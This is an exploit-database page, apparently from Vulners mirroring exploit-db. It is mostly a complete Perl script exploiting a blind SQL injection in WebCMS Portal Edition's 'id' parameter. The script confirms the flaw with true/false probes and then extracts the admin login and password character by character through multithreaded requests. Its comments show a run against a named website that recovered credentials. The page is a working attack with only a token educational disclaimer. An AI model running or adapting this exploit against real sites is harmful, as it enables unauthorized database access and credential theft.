Lucene search
+L

WebCMS Portal Edition - 'id' Blind SQL Injection

🗓️ 05 Sep 2008 00:00:00Reported by JosSType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 32 Views

WebCMS Portal Edition - 'id' Blind SQL Injection Exploi

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2008-4185
5 Sep 200800:00
circl
Circl
CVE-2008-4186
5 Sep 200800:00
circl
CVE
CVE-2008-4185
23 Sep 200815:00
cve
CVE
CVE-2008-4186
23 Sep 200815:00
cve
Cvelist
CVE-2008-4185
23 Sep 200815:00
cvelist
Cvelist
CVE-2008-4186
23 Sep 200815:00
cvelist
EUVD
EUVD-2008-4168
7 Oct 202500:30
euvd
EUVD
EUVD-2008-4169
7 Oct 202500:30
euvd
NVD
CVE-2008-4185
23 Sep 200815:25
nvd
NVD
CVE-2008-4186
23 Sep 200815:25
nvd
Rows per page
#!/usr/bin/perl -W

# webCMS Portal Edition (index.php id) Blind SQL Injection Exploit
# url: webcms.es
#
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://spanish-hackers.com

# team: Spanish Hackers Team - [SHT]
#
# h4x0rz:/home/joss/Desktop# perl o.pl -u "http://www.jubicam.org/index.php?menu=documentos&id=69" -p Concurso
# [i] Getting default: -T 30
# [i] Getting default: -l 200
# [i] Getting default: -t 15
# 12 123 {
# [!] $EXIT_IF_NO_CHAR : I can't find a valid character, position 12.
# [i] USER / PASSWORD:
# root / a314
#
# This was written for educational purpose. Use it at your own risk.

# Author will be not responsible for any damage.

# special thanks: ka0x! http://milw0rm.com/papers/197

my $MAX_FIELD_LENGTH = 200 ;
my $EXIT_IF_NO_CHAR = 1 ;
my $DEFAULT_THREADS = 15 ;
my $DEFAULT_THREADS_TIMEOUT = 30 ;
my @ascii = ( 32 .. 123 ) ;
my $DEFAULT_THREADS_TIME = 1 ;


use LWP::UserAgent ;

sub _HELP_AND_EXIT
{
    die "

  ./$0 -u <url> -p <pattern>

 Options:
  -u    <url>               Ex: http://localhost/index.php?menu=documentos&id=69
  -p    <pattern>           HTML pattern.

 Other:
  -t    <#>                 Threads, default '$DEFAULT_THREADS'.
  -l    <#>                 Maximum table name length '$MAX_FIELD_LENGTH'.
  -T    <#>                 Timeout.
  -h                        Help (also with --help).

  Example:

  ./$0 -u \"http://localhost/index.php?menu=documentos&id=69\" -p Concurso

" ;
}


    my ($p, $w) = ({ @ARGV }, { }) ;

    map {
        &_HELP_AND_EXIT if $_ eq '--help' or $_ eq '-h' ;
    } keys %$p ;

    map {
        die "[!] Require: $_\n[!] Help: ./$0 --help\n" unless $p->{ $_ } ;
    } qw/-u -p/ ;

    $p->{'-t'} = ( $p->{'-t'} and $p->{'-t'} =~ /^\d+$/ ) ? $p->{'-t'} : ( $w->{'-t'} = $DEFAULT_THREADS ) ;
    $p->{'-l'} = ( $p->{'-l'} and $p->{'-l'} =~ /^\d+$/ ) ? $p->{'-l'} : ( $w->{'-l'} = $MAX_FIELD_LENGTH ) ;
    $p->{'-T'} = ( $p->{'-T'} and $p->{'-T'} =~ /^\d+$/ ) ? $p->{'-T'} : ( $w->{'-T'} = $DEFAULT_THREADS_TIMEOUT ) ;

    map {
        warn "[i] Getting default: $_ $w->{ $_ }\n" ;
    } sort keys %$w ;

    ( &_IS_VULN( $p ) ) ? &_START_WORK( $p ) : die "[i] Bad pattern ? Isn't vulnerable ?\n" ;




sub _START_WORK
{
    my $p = shift ;

    my $position = 1 ;

    pipe(R, W) ;
    pipe(Rs, Ws) ;
    autoflush STDOUT 1 ;

    my $sql_message = '' ;
    my $msg = '' ;
    my @pid ;

    while( $position <= $p->{'-l'} )
    {
        my $cf ;
        unless( $cf = fork ){ &_CHECKING( $p, $position ) ; exit(0) ; }
        push(@pid, $cf) ;

        my $count = 0 ;
        my $can_exit ;
        my $char_printed ;

        while(<R>)
        {
            chomp ;
            push(@pid, (split(/:/))[1] ) if /^pid/ ;

            my ($res, $pos, $ascii) = ( split(/ /, $_) ) ;
            $count++ if $pos == $position ;

            print "\b" x length($msg), ($msg = "$position $ascii " . chr($ascii) ) ;

            if( $res eq 'yes' and $pos == $position ){
                    $char_printed = $can_exit = 1 ;
                    print Ws "STOP $position\n" ;
                    $sql_message .= chr( $ascii ) ;
            }

            last if ( $can_exit or $count == @ascii );
        }

        map { waitpid($_, 0) } @pid ;

        unless( $char_printed )
        {
            if( $EXIT_IF_NO_CHAR )
            {
                warn "\n[!] \$EXIT_IF_NO_CHAR : I can't find a valid character, position $position.\n"  ;
                last ;
            }
        }

        $position++ ;
    }

    print "[i] USER / PASSWORD:\n$sql_message\n" ;

}

sub _CHECKING
{
    my ($p, $position) = @_ ;
    my $counter = 0 ;
    my $stop_position ;

    foreach my $ascii ( @ascii )
    {
        $counter++ ;

        if( $counter % $p->{'-t'} == 0 )
        {
            my $stop_position ;
            eval
            {
                $SIG{'ALRM'} = sub { die "non_stop\n" } ;
                alarm $DEFAULT_THREADS_TIME ;
                my $line = <Rs> ;
                $stop_position = (split( / /, $line))[1] ;
                alarm 0 ;
            } ;

            if( ($stop_position) and $stop_position == $position ){ print "\nnext position\n" ; exit(0) ; }
        }

        unless(my $pid = fork )
        {
            print Ws "pid:$pid\n" or die ;


            my $url = $p->{'-u'} .
                ' AND ascii(substring((SELECT CONCAT(login,0x202f20,password) FROM usuarios LIMIT 0,1),' . $position . ',1))='. $ascii ;

            my $ua = LWP::UserAgent->new ;
            $ua->timeout( $p->{'-T'} ) ;

            my $content ;
            while( 1 )
            {
                last if $content = $ua->get( $url )->content ;
            }

            ( $content =~ /$p->{'-p'}/ ) ? print W "yes $position $ascii\n" : print W "no $position $ascii\n" ;

            exit( 0 ) ;
        }

    }
}



sub _IS_VULN
{
    my $p = shift ;

    my $ua = LWP::UserAgent->new ;
    $ua->timeout( $p->{'-T'} ) ;

    my ( $one, $two ) = (
        $ua->get( $p->{'-u'}." AND 1=1")->content ,
        $ua->get( $p->{'-u'}." AND 1=2")->content ,
    ) ;

    return ($one =~ /$p->{'-p'}/ and $two !~ /$p->{'-p'}/) ? 1 : undef ;
}

# milw0rm.com [2008-09-05]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

13 Dec 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.01151
32